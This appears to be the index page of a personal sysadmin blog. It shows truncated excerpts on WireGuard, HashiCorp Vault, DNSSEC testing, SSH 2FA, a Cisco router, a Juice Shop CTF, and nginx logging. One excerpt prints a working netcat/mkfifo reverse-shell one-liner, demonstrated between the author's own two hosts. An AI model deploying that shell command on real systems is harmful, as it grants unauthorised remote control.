
Wireguard on Debian

Wireguard with Debian Grab a Fresh Debian which has Public Internet Access. Target is to build a WG Tunnel and assign a Public IP to the Server. Debian 11.6 apt-get install -y wireguard wireguard-tools Gen Key cd /etc/wireguard umask 077; wg genkey | tee privatekey | wg pubkey > publickey Set Vars myprivkey=$(cat privatekey) mypublicaddress="45.xx.xx.xx/28, 2a0e:xxxx:xxx::xxx/64" yourpubkey="3XK8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=" yourpubip="" yourpubport="443" Config cat << EOF > wg0.conf [Interface] PrivateKey = ${myprivkey} Address = PUBLIC_IP_V4/xx, PUBLIC_IP_V6/xx [Peer] PublicKey = ${yourpubkey} Endpoint = ${yourpubip}:${yourpubport} AllowedIPs = 0.

Hashicorp - Vault

some Hands’on with Hashicorp Vault Source Install on macos brew tap hashicorp/tap brew install hashicorp/tap/vault Run on Docker in Background, you have to kill it later docker run -d -p 8200:8200 -e 'VAULT_DEV_ROOT_TOKEN_ID=dev-only-token' vault Unseal Key: 2KTIMp0Md52V2xTb0txxxxxxxxxxxxxxxxxxxxxxxxx= Root Token: dev-only-token this is a dev instance only and has no persistent data. don’t worry. Open Browser http://localhost:8200 -> root token Export in Terminal export VAULT_ADDR='' export VAULT_TOKEN="dev-only-token" Set Key curl --header "X-Vault-Token: $VAULT_TOKEN" \ --header "Content-Type: application/json" \ --request POST \ --data '{"data": {"password": "Hashi123"}}' \ -s http://127.

OpenBSD - ReverseShell

Reverse Shells Test it Listen on Host A Set Lister on Host A ( hostA # nc -l 4242 Start Reverse Shell on Host B hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 4242 >/tmp/f here we are hostA # hostname hostA.somewhere hostA # nc -l 4242 hostB # hostname hostB.somewhere nice ;) Any Comments ? sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

DNSSEC - OARC Size Tester

Talk from @mwl at BSDCAN 2022 OARC Reply Size Tester dig +short TXT Host1 - good :) # dig +short TXT " DNS reply size limit is at least 4090" " sent EDNS buffer size 4096" Host2 - bad :( # dig +short TXT " DNS reply size limit is at least 1206" " sent EDNS buffer size 1232" Any Comments ?

OpenBSD - Full Disk Encryption

Intro I never used the Fulldisk Encryption Feature as there was no need for. It doesn’t make sense for Hosted VM’s, as you have to enter the Passphrase at every boot at the Console. So, it’s a pain and still possible to intercept on the Hosters Infrastructure. Disk Encryption does not make sense at home, as all my Devices remains at home (and hopefully never got stolen). It would make sense on a Notebook, but i’m more the Apple Fanboy when it comes to portable Machines.

OpenSSH 2FA Google Auth

Let’s give a try with Alpine Linux, OpenSSH and 2FA with Google Authenticator. add Packages apk add openssh openssh-server-pam google-authenticator openssh-doc google-authenticator-doc libqrencode Configure GoogleAuth touch /etc/pam.d/sshd ln /etc/pam.d/sshd /etc/pam.d/sshd.pam cat << 'EOF' >> /etc/pam.d/sshd.pam account include base-account auth required auth required successok auth required /lib/security/ echo_verification_code grace_period=57600 nullok auth required md5 sha512 EOF update sshd_config cat << 'EOF' >> /etc/ssh/sshd_config PasswordAuthentication no AuthenticationMethods any UsePAM yes EOF Restart SSHD service sshd restart Setup User su - USERNAME google-authenticator Response

Cisco Router, SSH, PubKey, ...

Intro I stumbled across an old Cisco box in the basement. I thought i might have some fun (or frust?) with the aging Device. The Hardware still works fine, right ? And what about the Software ? Let’s give a try ! Hardware show version Cisco 1841 (revision 7.0) with 352256K/40960K bytes of memory. Processor board ID FCZ1234757Y 6 FastEthernet interfaces 1 Virtual Private Network (VPN) Module DRAM configuration is 64 bits wide with parity disabled.

Kubernetes Multi-Juicer

If you ever wanna run a Multiplayer OWASP Juice Shop CTF on your own, here are some Notes and Info for bloody beginners References Prerequisite you’ve got a Digital Ocean Account (or some other Cloud Provider) a spare domain and set the NS of DigitalOcean Digital Ocean CMD Line Tools installed and configured helm tools (kubernetes package manager -> brew install helm) some budget (~2 CHF/Day) 30min for Setup btw.

Area 41

Area41 Looking Forward to the next Security Congress in Zurich . It’s sold out since a while, happy i got a early ticket :) … and all the Talks are online … Any Comments ? sha256: 07f41198ed084963405456466b567179077366052c560295e9868a0046f0a714

Nginx - Log Headers

How to enable Logging with Headers for Nginx Assuming you have a running setup and you want to enable logging with headers for debug and learning purposes ? Add Lua doas pkg_add nginx-lua-- and you get … doas pkg_info -L nginx-lua-- Information for inst:nginx-lua-1.20.1p0 Files: /var/www/modules/ /var/www/modules/ Enable Modules in /etc/nginx/nginx.conf add two lines on Top load_module "modules/"; load_module "modules/"; Enhance Logging add the following to the “http” Section log_format log_req_resp '$remote_addr - $remote_user [$time_local] ' '"$request" $status $body_bytes_sent ' '"$http_referer" "$http_user_agent" ' '$request_time req_header:"$req_header" ' 'resp_header:"$resp_header"'; Enable Logging add the following lines to your virtual Host Section